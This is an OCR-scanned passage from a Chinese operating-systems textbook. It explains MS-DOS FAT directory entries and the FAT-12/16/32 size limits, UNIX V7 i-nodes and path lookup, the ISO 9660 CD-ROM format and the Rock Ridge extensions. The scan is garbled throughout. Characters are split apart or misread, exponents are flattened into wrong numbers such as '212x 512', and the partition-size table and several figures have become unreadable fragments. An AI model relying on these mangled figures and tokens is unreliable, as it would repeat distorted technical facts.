少 于 8+ 3 个 字符 的 文件 名 左 对 齐 ， 在 右边 补 空格 。 属 性 域 是 一 个 新 的 域 ， 包 含 用 来 指示 一 个 文件 是 只 读 
的 、 存 档 的 、 隐 藏 的 还 是 一 个 系统 文件 的 位 。 不 能 写 只 读 文件 ， 这 样 避 免 了 文件 意外 受 损 。 存 档 位 没有 
对 应 的 操作 系统 的 功能 ( 即 MS-DOS 不 检查 和 设置 它 )。 存 档 位 主要 的 用 途 是 使 用 户 级 别 的 存档 程序 在 
存档 一 个 文件 后 清理 这 一 位 ， 其 他 程序 在 修改 了 这 个 文件 之 后 设置 这 一 位 。 以 这 种 方式 ， 一 个 备份 程序 
可 以 检查 每 个 文件 的 这 一 位 来 确定 是 否 需 要 备份 该 文件 。 设 置 隐藏 位 能 够 使 一 个 文件 在 目录 列表 中 不 出 
现 ， 其 作用 是 避免 初级 用 户 被 一 些 不 熟悉 的 文件 搞 糊涂 了 。 最 后 ， 系 统 位 也 隐藏 文件 。 另 外 ， 系 统 文件 
不 可 以 用 del 命 令 删 除 ， 在 MS-DOS 的 主要 组 成 部 分 中 ， 系 统 位 都 被 设置 。 
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TRA 保留 时 间 日 期 第 一 块 块 号 
图 4-30 MS-DOS 的 目录 项 


目录 项 也 包含 了 文件 建立 和 最 后 修改 的 日 期 和 时 间 。 时 间 只 是 精确 到 土 23$， 因 为 它 只 是 用 2 个 字 节 
的 域 来 存储 ， 只 能 存储 65 536 个 不 同 的 值 (一 天 包含 86 400 秒 )。 这 个 时 间 域 被 分 为 秒 (5 个 位 )、 分 (6 
个 位 ) 和 小 时 (5 个 位 )。 以 日 为 单位 计算 的 日 期 使 用 三 个 子 域 : 日 (5 个 位 )， 月 (4 个 位 ), 年 -1980 (7 
个 位 )。 用 7 个 位 的 数字 表示 年 ， 时 间 的 起 始 为 1980 年 ， 最 高 的 表示 年 份 是 2107 年 。 所 以 MS-DOS 有 内 在 
的 2108 年 问题 。 为 了 避免 灾难 ，MS-DOS 的 用 户 应 该 尽快 开始 在 2108 年 之 前 转变 工作 。 如 果 把 MS-DOS 
使 用 组 合 的 日 期 和 时 间 域 作为 32 位 的 秒 计数 器 ， 它 就 能 准确 到 秒 ， 可 把 灾难 推迟 到 2116 年 。 

MS-DOS 按 32 位 的 数字 存储 文件 的 大 小 ， 所 以 理论 上 文件 大 小 能 够 大 至 4GB 。 尽 管 如 此 ， 其 他 的 约 
R (下 面 论述 ) 将 最 大 文件 限制 在 2GB 或 者 更 小 。 让 人 吃惊 的 是 目录 项 中 的 很 大 一 部 分 空间 (10 FH) 
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0 L E 


没有 使 用 。 

MS-DOS 通 过 内 存 里 的 文件 分 配 表 来 跟踪 文件 块 。 目 录 表 项 包含 了 第 一 个 文件 块 的 编号 ， 这 个 编号 用 
作 内 存 里 有 64K 个 目录 项 的 FAT 的 索引 。 沿 着 这 条 链 ， 所 有 的 块 都 能 找到 。FAT 的 操作 在 图 4-12 中 有 描述 。 

FAT 文 件 系 统 总 共有 FAT-12、FAT-16 和 FAT-32 三 个 版 本 ， 这 取决 于 磁盘 地 址 包含 有 多 少 二 进 制 位 ，。 
其 实 ，FAT.32 只 用 到 了 地 址 空间 中 的 低 28 位 ， 它 更 应 该 叫 EAT28。 但 使 用 2 的 稼 的 这 种 表述 听 起 来 要 匀 
整 得 多 。 

FAT 文 件 系统 的 另外 一 个 变种 是 exFAT， 它 是 微软 为 大 型 可 移动 设备 设计 的 。 苹 果 公 司 获 得 了 
exFAT 的 授权 ， 所 以 exFAT 是 一 个 既 可 以 在 Windows 又 可 以 在 OS X 上 用 于 传输 文件 的 现代 文件 系统 。 由 
于 exFAT 是 一 项 专利 ， 并 且 微软 没有 发 布 其 说 明 书 ， 因 此 就 不 在 这 里 进一步 讨论 了 。 

在 所 有 的 FAT 中 ， 都 可 以 把 磁盘 块 大 小 调整 到 512 字 节 的 倍数 (不 同 的 分 区 可 能 采用 不 同 的 倍数 )， 
合法 的 块 大 小 (微软 称 之 为 簇 大 小 ) 在 不 同 的 FAT 中 也 会 有 所 不 同 。 第 一 版 的 MS-DOS 使 用 块 大 小 为 512 
字 节 的 FEAT12， 分 区 大 小 最 大 为 212x 512 字 节 (实际 上 只 有 4086 x 512 字 节 ， 因 为 有 10 个 磁盘 地 址 被 用 
作 特 殊 的 标记 ， 如 文件 的 结尾 、 坏 块 等 )。 根 据 这 些 参数 ， 最 大 的 磁盘 分 区 大 小 约 为 2MB ， 而 内 存 里 的 
FAT 表 中 有 4096 个 项 ， 每 项 2 字 节 (16 位 )。 若 使 用 12 位 的 目录 项 则 会 非常 慢 。 

这 个 系统 在 软盘 条 件 下 工作 得 很 好 ， 但 当 硬盘 出 现时 ， 它 就 出 现 问题 了 。 微 软 通过 允许 其 他 的 块 大 
小 如 (IKB, 2KB,4KB) 来 解决 这 个 问题 。 这 个 修改 保留 了 FAT-12 表 的 结构 和 大 小 ， 但 是 允许 可 达 16 
MB 的 磁盘 分 区 。 

由 于 MS-DOS 支 持 在 每 个 磁盘 驱动 器 中 划分 四 个 磁盘 分 区 ， 所 以 新 的 FAT-12 文 件 系统 可 在 最 大 
64MB 的 磁盘 上 工作 。 除 此 之 外 ， 还 必须 引入 新 的 内 容 。 于 是 就 引进 了 FAT.16， 它 有 16 位 的 磁盘 指针 ， 
而 且 人 允许 8SKB、16KB 和 32KB 的 块 大 小 (32 768 是 用 16 位 可 以 表示 的 2 的 最 大 寡 )。FAT-16 表 需要 占据 内 
存 128KB 的 空间 。 由 于 当时 已 经 有 更 大 的 内 存 ， 所 以 它 很 快 就 得 到 了 应 用 ， 并 且 取 代 了 FAT-12 系 统 。 
FAT-16 能 够 支持 的 最 大 磁盘 分 区 是 2GB (64K 个 项 ， 每 个 项 32KB) ， 支 持 最 大 8GB 的 磁盘 ， 即 4 个 分 区 ， 
每 个 分 区 2GB 。 

但 是 不 可 能 永久 这 样 。 对 于 商业 信函 来 说 ， 这 个 限制 不 是 问题 ， 但 对 于 存储 采用 DV 标 准 的 数字 视 
频 来 说 ， 一 个 2GB 的 文件 仅 能 保存 9 分 钟 多 一 点 的 视频 。 结 果 就 是 无 论 磁盘 有 多 大 ，PC 的 磁盘 也 只 能 支 
持 四 个 分 区 ， 能 存储 在 磁盘 中 的 最 长 的 视频 大 约 是 38 
分 钟 。 这 一 限制 也 意味 着 ， 能 够 在 线 编辑 的 最 大 的 视 
频 少 于 19 分 钟 ， 因 为 同时 需要 输入 和 输出 文件 。 | oskB | 2MB | | 

BG Windows 95 第 2 版 的 发 行 ， 引 入 了 FAT-32 文 件 


0 E 
系统 ， 它 具有 28 位 磁盘 地 址 。 在 Windwos 95 下 的 MS- | ?kB | sMB | lsMB | | 
DOsS 也 被 改造 ， 以 适应 FAT32。 在 这 个 系统 中 , 分 区 | “KB |ie | 256MB | ITB | 

ooid | skB | | sms | 27B | 
理论 上 能 达到 2”x 2” 字 节 ,， 但 实际 上 是 限制 在 2TB 
| ikB | |o | 2TB | 
(2048GB), p 因为 系统 在 内 部 的 S12 字 节 长 的 扇 区 中 使 | sz | |2048MB | zm | 
用 了 一 个 32 位 的 数字 来 记录 分 区 的 大 小 ， 这 样 2? x 2 
ea aa 图 4-31 对 应 不 同 的 块 大 小 的 最 大 分 区 ( 空 
x -31 中 表示 pene 
‘ 格 表示 禁止 这 种 组 合 ) 
除了 支持 更 大 的 磁盘 之 外 ，FAT-32 文 件 系统 相 比 c 
FAT-16 文 件 系统 有 另外 两 个 优点 。 首 先 ， 一 个 用 FAT-32 的 8GB 磁 盘 可 以 是 一 个 分 区 ， 而 使 用 FAT-16 则 必 
须 是 四 个 分 区 ， 对 于 Windows 用 户 来 说 ， 就 是 “C:”“D:”“E;” 和 “F;” 人 逻辑 磁盘 驱动 器 。 用 户 可 以 
自己 决定 哪个 文件 放 在 哪个 盘 以 及 记录 的 内 容 放 在 什么 地 方 。 
FAT-32 相 对 于 FAT-16 的 另外 一 个 优点 是 ， 对 于 一 个 给 定 大 小 的 硬盘 分 区 ， 可 以 使 用 一 个 小 一 点 的 块 
大 小 。 例 如 ， 对 于 一 个 2GB 的 硬盘 分 区 ，FAT-16 必 须 使 用 32KB 的 块 ， 否 则 仅 有 的 64K 个 磁盘 地 址 就 不 能 
覆盖 整个 分 区 。 相 反 ，FAT-32 处 理 一 个 2GB 的 硬盘 分 区 的 时 候 就 能 够 使 用 4KB 的 块 。 使 用 小 块 的 好 处 是 
大 部 分 文件 都 小 于 32KB 。 如 果 块 大 小 是 32KB， 那 么 一 个 10 字 节 的 文件 就 占用 32KB 的 空间 ， 如 果 文 件 
平均 大 小 是 8KB， 使 用 32KB 的 块 大 小 ，3/4 的 磁盘 空间 会 被 浪费 ， 这 不 是 使 用 磁盘 的 有 效 方法 。 而 8KB 
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的 文件 用 4KB 的 块 没有 空间 的 损失 ， 却 会 有 更 多 的 RAM 被 FAT 系 统 占用 。 把 4KB 的 块 应 用 到 一 个 2GB 的 
磁盘 分 区 ， 会 有 512K 个 块 ， 所 以 FAT 系 统 必须 在 内 存 里 包含 512K 个 项 (占用 了 2MB 的 RAM)。 

MS-DOS 使 用 FAT 来 跟踪 空 闪 磁盘 块 。 当 前 没有 分 配 的 任何 块 都 会 标 上 一 个 特殊 的 代码 。 当 MS- 
DOS 需 要 一 个 新 的 磁盘 块 时 ， 它 会 搜索 FAT 以 找到 一 个 包含 这 个 代码 的 项 。 所 以 不 需要 位 图 或 者 空闲 表 。 
4.5.2 UNIX V7 文件 系统 

即使 是 早期 版 本 的 UNIX 也 有 一 个 相当 复杂 的 多 用 户 文件 系统 ， 因 为 它 是 从 MULTICS 继 承 下 来 的 。 
下 面 我 们 将 会 讨论 V7 文件 系统 ， 这 是 为 PDP-11 创 建 的 一 个 文件 系统 ， 它 也 使 得 UNIX 闻 名 于 世 。 我 们 将 
在 第 10 章 通过 Linux 讨 论 现代 UNIX 的 文件 系统 。 


文件 系统 从 根 目录 开始 形成 树 状 ， 加 上 和 链接， 形成 了 一 个 ” 字 节 2 14 
有 向 无 环 图 。 文 件 名 可 以 多 达 14 个 字符 ， 能 够 容纳 除了 /和 | iig 
NUL 之 外 的 任何 ASCII 字 符 ，NUL 也 表示 成 数字 数值 0。 


UNIX 目 录 中 为 每 个 文件 保留 了 一 项 。 每 项 都 很 简单 ， 
为 UNIX 使 用 i 节 点 ， 如 图 4-13 中 所 示 。 一 个 目录 项 包含 了 两 个 证 点 号 
BR, 文件 名 (14 个 字 节 ) 和 i 节点 的 编号 (2 个 字 节 )， 如 图 4-32 图 4-32 UNIX V7 的 目录 表 项 
所 示 。 这 些 参 数 决定 了 每 个 文件 系统 的 文件 数目 为 64K。 

就 像 图 4-13 中 的 i 节点 一 样 ，UNIX 的 i 节点 包含 一 些 属性 。 这 些 属性 包括 文件 大 小 、 三 个 时 间 (创建 
时 间 ， 最 后 访问 时 间 ， 最 后 修改 时 间 )、 所 有 者 、 所 在 组 、 保 护 信 息 以 及 一 个 计数 (用 于 记录 指向 节点 的 
目录 项 的 数量 )。 最 后 一 个 域 是 为 了 链接 而 设 的 。 当 一 个 新 的 链接 加 到 一 个 地 点 上 ，i 市 点 里 的 计数 就 会 
加 1。 当 移 走 一 个 链接 时 ， 该 计数 就 减 1。 当 计数 为 0 时 ， 就 收回 该 地 点 ， 并 将 对 应 的 磁盘 块 放 进 空闲 表 。 

对 于 特别 大 的 文件 ， 可 以 通过 图 4-13 所 示 的 方法 来 跟踪 磁盘 块 。 前 10 个 磁盘 地 址 是 存储 在 i 节点 自 
身 中 的 ， 所 以 对 于 小 文件 来 说 ， 所 有 必需 的 信息 恰好 是 在 i 节点 中 。 而 当 文 件 被 打开 时 ，i 节 点 将 被 从 磁 
盘 取 到 内 存 中 。 对 于 大 一 些 的 文件 ，i 节 点 内 的 其 中 一 个 地 址 是 称 为 一 次 间接 块 (single indirect block) 
的 磁盘 块 地 址 。 这 个 块 包 含 了 附加 的 磁盘 地 址 。 如 果 还 不 够 的 话 ， 在 i 节点 中 还 有 另 一 个 地 址 ， 称 为 二 
次 间接 块 (double indirect block)。 它 包含 一 个 块 的 地 址 ， 在 这 个 块 中 包含 若干 个 一 次 间接 块 。 每 一 个 
这 样 的 一 次 间接 块 指向 数 百 个 数据 块 。 如 果 这 样 还 不 够 的 话 , 可 以 使 用 三 次 间接 块 (triple indirect block) , 
整个 情况 参见 图 4-33。 


磁盘 地 址 





图 4-33 一 个 UNIX 的 i 地 点 


当 打 开 某 个 文件 时 ， 文 件 系统 必须 要 获得 文件 名 并 且 定 位 它 所 在 的 磁盘 块 。 让 我 们 来 看 一 下 怎样 查 
找 路 径 名 /usr/ast/mbox。 以 UNIX 为 例 ， 但 对 所 有 的 层次 目录 系统 来 说 ， 这 个 算法 是 大 致 相同 的 。 首 先 ， 
文件 系统 定位 根 目录 。 在 UNIX 系 统 中 ， 根 目录 的 i 节点 存放 于 磁盘 上 固定 的 位 置 。 从 这 个 i 节点， 系统 将 
可 以 定位 根 目录 ， 虽 然 根 目录 可 以 放 在 磁盘 上 的 任何 位 置 ， 但 假定 它 放 在 磁盘 块 1 的 位 置 。 
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接 下 来 ， 系 统 读 根 目 录 并 且 在 根 目 录 中 查找 路 径 的 第 一 个 分 量 usr， 以 获取 /usr 目 录 的 i 节点 号 。 由 i 
节点 号 来 定位 节点 是 很 直接 的 ， 因 为 每 个 i 节点 在 磁盘 上 都 有 固定 的 位 置 。 根 据 这 个 节点， 系统 定位 
/usr 目 录 并 在 其 中 查找 下 一 个 分 量 ast。 一 旦 找到 ast 的 项 ， 便 找到 了 /usr/ast 目 录 的 i 节点 。 依 据 这 个 节点， 
可 以 定位 该 目录 并 在 其 中 查找 mbox。 然 后 ， 这 个 文件 的 i 节点 被 读 入 内 存 ， 并 且 在 文件 关闭 之 前 会 一 直 
保留 在 内 存 中 。 图 4-34 显 示 了 查找 的 过 程 。 


块 132 是 /usr/ast 的 块 406 是 
根 目录 /usr 的 i 节点 6 /usr 目 录 i 节点 26 usr/ast 目 录 





i i 节点 26 说 明 
查找 usr 得 到 wie rf RE Jusr/ast 在 块 。 /usrasUmbox 


i 和 点 6 406 中 是 节点 60 


图 4-34 查找 /usr/ast/mbox 的 过 程 


相对 路 径 名 的 查找 同 绝对 路 径 的 查找 方法 相同 ， 只 不 过 是 从 当前 工作 目录 开始 查找 而 不 是 从 根 目录 
开始 。 每 个 目录 都 有 .和 .. 项 ， 它 们 是 在 目录 创建 的 时 候 同时 创建 的 。. 表 项 是 当前 目录 的 i 节点 号 ,而 .. 表 
项 是 父 目 录 (上 一 层 目 录 ) 的 i 节 点 号 。 这 样 ， 查 找 ../dick/prog.c 的 过 程 就 成 为 在 工作 目录 中 查找 …， 寻 
找 父 目 录 的 i 节点 号 ， 并 查询 dick 目 录 。 不 需要 专门 的 机 制 处 理 这 些 名 字 。 目 录 系 统 只 要 把 这 些 名 字 看 作 
普通 的 ASCII 字 符 串 即 可 ， 如 同 其 他 的 名 字 一 样 。 这 里 唯一 的 巧妙 之 处 是 .. 在 根 目录 中 指向 自身 。 
4.5.3 CD-ROM 文 件 系 统 

作为 最 后 一 个 文件 系统 实例 ， 让 我 们 来 看 看 用 于 CD-ROM 的 文件 系统 。 因 为 这 些 文件 系统 是 为 一 次 
性 写 介质 设计 的 ， 所 以 非常 简单 。 例 如 ， 该 文件 系统 不 需要 记录 空闲 块 ， 这 是 因为 一 旦 光盘 生产 出 来 后 ， 
CD-ROM 上 的 文件 就 不 能 被 删除 或 者 创建 了 。 下 面 我 们 来 看 看 主要 的 CD-ROM 文 件 系统 类 型 以 及 对 这 个 
文件 系统 的 两 种 扩展 。 尽 管 只 读 光 盘 已 经 过 时 ， 但 它 仍 旧 是 一 种 简单 的 存储 手段 ， 应 用 于 DVD 和 蓝光 光 
盘 的 文件 系统 也 是 基于 CD-ROMS 开 发 出 来 的 。 

在 CD-ROM 出 现 一 些 年 后 ， 引 进 了 CD-R (可 记录 CD)。 不 像 CD-ROM，CD-R 可 以 在 初次 刻录 之 后 
加 文件 ， 但 只 能 简单 地 加 在 CD-R 的 最 后 面 。 文 件 不 能 删除 (尽管 可 以 更 新 目录 来 隐藏 已 存在 的 文件 ) 。 
因而 对 于 这 种 “只 能 添加 ”的 文件 系统 ， 其 基本 的 性 质 不 会 改变 。 特 别 地 ， 所 有 的 空闲 空间 放 在 了 CD 
末端 连续 的 一 大 块 内 。 

1. ISO 9660 文 件 系统 

最 普遍 的 一 种 CD-ROM 文 件 系统 的 标准 是 1988 年 被 采纳 的 名 为 ISO 9660 的 国际 标准 。 实 际 上 现在 
市 场 上 的 所 有 CD-ROM 都 支持 这 个 标准 ， 有 的 则 带 有 一 些 扩展 (下面 会 对 此 进行 讨论 )。 这 个 标准 的 一 
个 目标 就 是 使 CD-ROM 独 立 于 机 器 所 采用 的 字 节 顺序 和 使 用 的 操作 系统 , 即 在 所 有 的 机 器 上 都 是 可 读 的 。 
因此 ， 在 该 文件 系统 上 加 上 了 一 些 限制 ， 使 得 最 弱 的 操作 系统 (如 MS-DOS) 也 能 读 取 该 文件 系统 。 

CD-ROM 没 有 和 磁盘 一 样 的 同心 柱 面 ， 而 是 沿 一 个 连续 的 螺旋 线 来 顺序 存储 信息 (当然 ， 跨 越 螺 旋 
线 查 找 也 是 可 能 的 ) 。 螺 旋 上 的 位 序列 被 划分 成 大 小 为 2352 字 节 的 逻辑 块 (也 称 为 逻辑 扇 区 ) 。 这 些 块 有 
的 用 来 进行 引导 ， 有 的 用 来 进行 错误 纠正 或 者 其 他 一 些 用 途 。 每 个 逻辑 块 的 有 效 部 分 是 2048 字 节 。 当 用 
于 存放 音乐 时 ，CD 中 有 导入 部 分 、 导 出 部 分 以 及 轨道 间 的 间隙 ， 但 是 用 于 存储 数据 的 CD-ROM 则 没有 
这 些 。 通 常 ， 螺 旋 上 的 逻辑 块 是 按 分 钟 或 者 秒 进 行 分 配 的 。 通 过 转换 系数 1 秒 =75 块 ， 则 可 以 转换 得 到 
相应 的 线性 块 号 。 
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ISO 9660 支 持 的 CD-ROM 集 可 以 有 多 达 2"”-1 个 CD。 每 个 单独 的 CD-ROM 还 可 分 为 多 个 逻辑 卷 (分 
区 )。 下 面 我 们 重点 考虑 单个 没有 分 区 CD-ROM 时 的 ISO 9660, 

每 个 CD-ROM 有 16 块 作为 开始 ， 这 16 块 的 用 途 在 ISO 9660 标 准 中 没有 定义 。CD-ROM 制 造 商 可 以 在 
这 一 区 域 里 放 入 引导 程序 ， 使 计算 机 能 够 从 CD-ROM 引 导 ， 或 者 用 于 其 他 目的 。 接 下 来 的 一 块 存放 基本 
卷 描述 符 (primary volume descriptor) ， 基 本 卷 描述 符 包 含 了 CD-ROM 的 一 些 基本 信息 。 这 些 信息 包括 
系统 标识 符 (32 字 节 )、 卷 标识 符 (32 字 节 )、 发 布 标识 符 (128 字 节 ) 和 数据 预备 标识 符 (128 字 节 ) 。 
制造 商 可 以 在 上 面 的 几 个 域 中 填 人 需要 的 信息 ， 但 是 为 了 跨 平台 的 兼容 性 ， 不 能 使 用 大 写字 母 、 数 字 以 
及 很 少 一 部 分 标点 符号 。 

基本 卷 描 述 符 还 包含 了 三 个 文件 的 名 字 ， 这 三 个 文件 分 别 是 存储 概述 、 版 权 声明 和 文献 信息 。 除 此 
之 外 ， 还 包含 有 一 些 关 键 数 字 信息 ， 例 如 逻辑 块 的 大 小 (通常 为 2048， 但 是 在 某 些 情 况 下 可 以 是 4096、 
8192 或 者 更 大 )、CD-ROM 所 包含 的 块 数目 以 及 CD-ROM 的 创建 日 期 和 过 期 日 期 。 基 本 卷 描 述 符 也 包含 
了 根 目 录 的 目录 表 项 ,说 明 根 目录 在 CD-ROM 的 位 置 ( 即 从 哪 一 块 开 始 ) 。 从 这 个 根 目录 ， 系 统 就 能 找 
到 其 他 文件 所 在 的 位 置 。 

除 基本 卷 描述 符 之 外 ，CD-ROM 还 包含 有 一 个 补充 卷 描述 符 (supplementary volume descriptor), 
它 和 基本 卷 描述 符 包含 类 似 的 信息 ， 在 这 里 不 再 详细 讨论 。 

根 目录 和 所 有 的 其 他 目录 包含 可 变数 目的 目录 项 ， 目 录 中 的 最 后 一 个 目录 项 有 一 位 用 于 标记 该 目录 
项 是 目录 中 的 最 后 一 个 。 目 录 项 本 身 也 是 长 度 可 变 的 。 每 一 个 目录 项 由 10 到 12 个 域 构 成 ， 其 中 一 些 域 是 
ASCII 域 ， 另 外 一 些 是 二 进 制 数字 域 。 二 进 制 域 被 编码 两 次 ， 一 个 用 于 低地 址 结尾 格式 (例如 在 Pentium 
上 所 用 的 ) ， 一 个 用 于 高 地 址 结尾 格式 (例如 在 SPARC 上 所 用 的 )。 因 此 ， 一 个 16 位 的 数字 需要 4 个 字 节 ， 
一 个 32 位 的 数字 需要 8 个 字 节 。 

这 样 元 余 编 码 的 目的 主要 是 为 了 能 在 标准 发 展 的 同时 照顾 到 各 个 方面 的 利益 。 如 果 该 标准 仅 规定 低 
地 址 结尾 ， 那 么 在 产品 中 使 用 高 地 址 结尾 的 厂家 就 会 觉得 自己 受到 歧视 ， 就 不 会 接受 这 个 标准 。 所 以 我 
们 可 以 准确 地 用 元 余 的 字 节 /小 时 数 来 衡量 一 张 CD-ROM 的 情感 因素 。 

ISO 9660 目 录 项 的 格式 如 图 4-35 所 示 。 因 为 目录 项 是 长 度 可 变 的 ， 所 以 ， 第 一 个 域 就 说 明 这 一 项 的 
长 度 。 这 一 字 节 被 定义 为 高 位 在 左 ， 以 避免 混淆 。 


填充 
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图 4-35 ISO 9660 的 目录 项 


目录 项 可 能 包含 有 扩展 属性 。 如 果 使 用 了 这 个 特性 ， 则 第 二 个 字 节 就 说 明 扩 展 属性 的 长 度 。 
O 接 下 来 是 文件 本 身 的 起 始 块 。 文 件 是 以 连续 块 的 方式 存储 的 ， 所 以 一 个 文件 的 位 置 完 全 可 以 由 起 始 
块 的 位 置 和 大 小 来 确定 。 起 始 块 的 下 一 个 域 就 是 文件 大 小 。 

CD-ROM 的 日 期 和 时 间 被 记录 在 下 一 个 域 中 ， 其 中 分 隔 的 字 节 分 别 表示 年 、 月 、 日 、 小 时 、 分 钟 、 
秒 和 了 时区。 年份 是 从 1900 年 开始 计数 的 ， 这 意味 着 CD-ROM 将 会 遇 到 2156 年 问题 ， 因 为 在 2155 年 之 后 将 
会 是 1900 年 。 如 果 定 义 初始 的 日 期 为 1988 年 (标准 通过 的 那 一 年 ) 的 话 ， 那 么 这 个 问题 就 可 以 推迟 88 年 
产生 ， 也 就 是 2244 年 。 

标志 位 域 包 含 一 些 其 他 的 位 ， 包 括 一 个 用 来 在 打开 目录 时 隐藏 目录 项 (来 自 MS-DOS 的 特性 ) 的 标 
志 位 ， 一 个 用 以 区 分 该 项 是 文件 还 是 目录 的 标志 位 ， 一 个 用 以 标志 是 否 使 用 扩展 属性 的 标志 位 ， 以 及 一 
个 用 来 标志 该 项 是 否 为 目录 中 最 后 一 项 的 标志 位 。 其 他 一 些 标志 位 也 在 这 个 域 中 ， 但 是 在 此 我 们 不 再 讨 
论 。 下 一 个 域 说 明了 在 ISO 9660 的 最 简 版 本 中 是 否 使 用 文件 分 隔 块 ， 这 里 也 不 做 讨论 。 

再 下 一 个 域 标明 了 该 文件 放 在 哪 一 个 CD-ROM 上 。 一 个 CD-ROM 的 目录 项 可 以 引用 在 同一 CD- 
ROM 集 中 的 另外 一 个 CD-ROM 上 的 文件 。 用 这 样 的 方法 就 可 以 在 第 一 张 CD-ROM 上 建立 一 个 主 目录 ， 
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该 主 目录 列 出 了 在 这 个 CD-ROM 集 合 中 的 其 他 所 有 CD-ROM 上 的 文件 。 

图 4-35 中 标 有 L 的 域 给 出 了 文件 名 的 大 小 (以 字 节 为 单位 )。 之 后 的 域 就 是 文件 名 本 身 。 一 个 文件 名 
由 基本 名 、 一 个 点 、 扩 展 名 、 分 号 和 二 进 制 版 本 号 (1 或 2 个 字 节 ) 构成 。 基 本 名 和 扩展 名 可 以 使 用 大 写 
字母 、 数 字 0~9 和 下 划 线 。 禁 止 使 用 其 他 字符 以 保证 所 有 的 机 器 都 能 处 理 这 个 文件 名 。 基 本 名 最 多 可 以 
为 8 个 字符 ， 而 扩展 名 最 多 可 以 为 3 个 字符 。 这 样 做 是 为 了 保证 能 和 MS-DOS 兼 容 。 只 要 文件 的 版 本 号 不 
同 ， 则 相同 的 文件 名 可 以 在 同一 个 目录 中 出 现 多 次 。 

最 后 两 个 域 不 是 必需 的 。 填 充 域 用 来 保证 每 一 个 目录 项 都 是 偶数 个 字 节 ， 以 2 字 节 为 边界 对 齐 下 一 
项 的 数字 域 。 如 果 需 要 填充 的 话 ， 就 用 0 代替 。 最 后 一 个 域 是 系统 使 用 域 ， 该 域 的 功能 和 大 小 没有 定义 ， 
仅仅 只 要 求 该 域 为 偶数 个 字 节 。 不 同 的 系统 对 该 域 有 不 同 的 用 途 。 例 如 ，Macintosh 系 统 就 把 此 域 用 来 
保存 Finder 标 志 。 

一 个 目录 中 的 项 除了 前 两 项 之 外 ， 其 余 的 都 按 字母 顺序 排列 。 第 一 项 表示 当前 目录 本 身 ， 第 二 项 表 
示 当 前 目录 的 父 目 录 。 这 和 UNIX 的 .目录 项 和 .. 目 录 项 相似 。 而 文件 本 身 不 需要 按 其 目录 项 在 目录 中 的 
顺序 来 排列 。 

对 于 目录 中 目录 项 的 数目 没有 特定 的 限制 ;但 是 对 于 目录 的 嵌 套 次 度 有 限制 ， 最 大 的 目录 人 嵌 套 深度 
为 8。 为 了 使 得 有 关 的 实现 简化 一 些 ， 这 个 限制 是 任意 设置 的 。 

ISO 9660 定 义 了 三 个 级 别 。 级 别 1 的 限制 最 多 ， 限 制 文件 名 使 用 上 面 提 到 的 8 + 3 个 字符 的 表示 法 ， 
而 且 所 有 的 文件 必须 是 连续 的 〈 这 些 我 们 在 前 面 介绍 过 ) 。 进 而 ， 目 录 名 被 限制 在 8 个 字符 而 且 不 能 有 扩 
展 名 。 这 个 级 别 的 使 用 ， 使 得 CD-ROM 最 有 可 能 在 所 有 的 机 器 上 读 出 。 

级 别 2 放宽 了 对 长 度 的 限制 。 它 允许 文件 和 目录 名 多 达 31 个 字符 ， 但 是 字符 集 还 是 一 样 的 。 

级 别 3 使 用 和 级 别 2 同样 的 限制 ， 但 是 文件 不 需要 是 连续 的 。 在 这 个 级 别 上 ， 一 个 文件 可 以 由 几 个 段 
(extents) 构成 ， 每 一 个 段 可 以 由 若干 连续 分 块 构 成 。 同 一 个 分 块 可 以 在 一 个 文件 中 出 现 多 次 ， 也 可 以 
出 现在 两 个 或 者 更 多 的 文件 中 。 如 果 相 当 大 的 一 部 分 数据 在 几 个 文件 中 重复 ， 级 别 3 则 通过 要 求 数据 不 
能 出 现 多 次 来 进行 空间 上 的 优化 。 

2. Rock Ridge 扩 展 

正如 上 面 所 看 到 的 ，ISO 9660 在 很 多 方面 有 限制 。 在 这 个 标准 公布 不 久 ，UNIX 工 作者 开始 在 这 个 
标准 上 进行 扩展 ， 使 得 在 CD-ROM 上 能 实现 UNIX 文 件 系 统 。 这 个 扩展 被 命名 为 Rock Ridge， 这 个 名 字 
来 源 于 Gene Wilder 的 电影 《Blazing Saddles》 中 一 个 小 镇 ， 也 许 委 员 会 的 成 员 之 一 喜欢 这 个 电影 ， 便 以 
此 命名 。 

该 扩展 使 用 了 系统 使 用 域 ， 使 得 Rock Ridge CD-ROM 可 以 在 所 有 计算 机 上 可 读 。 其 他 所 有 的 域 仍 
然 保 持 ISO 9660 标 准 中 的 定义 。 所 有 其 他 不 识别 Rock Ridge 扩 展 的 系统 只 需要 忽略 这 个 扩展 ， 把 盘 当 作 
普通 的 CD-ROM 来 识别 即 可 。 

该 扩展 分 为 下 面 几 个 域 : 

1) PX 一 一 POSIX 属 性 。 

2) PN 一 一 主 设备 号 和 次 设备 号 。 





3) SL 一 一 符号 链接 。 
4) NM 一 一 替代 名 。 
5) CL 一 一 子 位 置 。 
6) PL 一 一 父 位 置 。 
7) RE 一 一 重 定位 。 
8) TF 一 一 时 间 戳 。 


PX 域 包含 了 标准 UNIX 的 rwxrwxrwx 所 有 者 、 同 组 用 户 和 其 他 用 户 权限 位 。 也 包含 了 包含 在 模式 字 
_ 中 的 其 他 位 ， 如 SETUID 位 和 SETGID 位 等 。 

为 了 能 在 CD-ROM 上 表示 原始 设备 ， 需 要 PN 域 来 表示 。 该 域 包含 了 和 文件 相关 的 主 设备 号 和 次 设 
备 号 。 这 样 ，/dev 目 录 的 内 容 就 可 以 在 写 到 CD-ROM 上 之 后 在 目标 系统 上 正确 地 重新 构造 。 

SL 域 是 符号 链接 ， 它 允许 在 一 个 文件 系统 上 的 文件 可 以 引用 另 一 个 文件 系统 上 的 文件 。 
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最 重要 的 域 是 NM 域 ， 它 允许 同一 个 文件 可 以 关联 第 二 个 名 字 。 这 个 名 字 不 受 ISO 9660 字 符 集 和 长 
度 的 限制 ， 这 样 使 得 在 CD-ROM 上 可 以 表示 任意 的 UNIX 文 件 。 

接 下 来 的 三 个 域 一 起 用 来 消除 ISO 9660 中 的 对 目录 和 嵌 套 深度 为 8 的 限制 。 使 用 这 几 个 域 可 以 指明 一 
个 目录 被 重 定 位 了 ， 而 且 可 以 标明 其 层次 结构 。 这 对 于 消除 深度 限制 非常 有 用 。 

最 后 ，TF 域 包含 了 每 个 UNIX 的 i 节点 中 的 三 个 时 间 莪 : 文件 创建 时 间 、 文 件 最 后 修改 时 间 和 文件 最 
后 访问 时 间 。 有 了 这 些 扩展 ， 就 可 以 将 一 个 UNIX 文 件 系 统 复制 到 CD-ROM 上， 并 且 能 够 在 不 同 的 系统 
上 正确 恢复 。 

3. Joliet 扩 展 

